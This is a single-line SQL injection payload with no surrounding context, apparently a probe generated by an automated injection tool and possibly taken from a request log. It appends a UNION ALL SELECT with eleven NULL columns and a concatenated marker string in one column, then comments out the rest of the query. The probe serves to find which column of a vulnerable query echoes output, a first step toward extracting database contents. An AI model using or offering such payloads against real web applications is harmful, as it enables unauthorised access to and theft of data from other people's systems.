UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,’qkqzq’||’WiHsljLqOXpuQHnlTwhXvQvdaOecniVAuFnCkWPO’||’qvvzq’,NULL,NULL– VCaE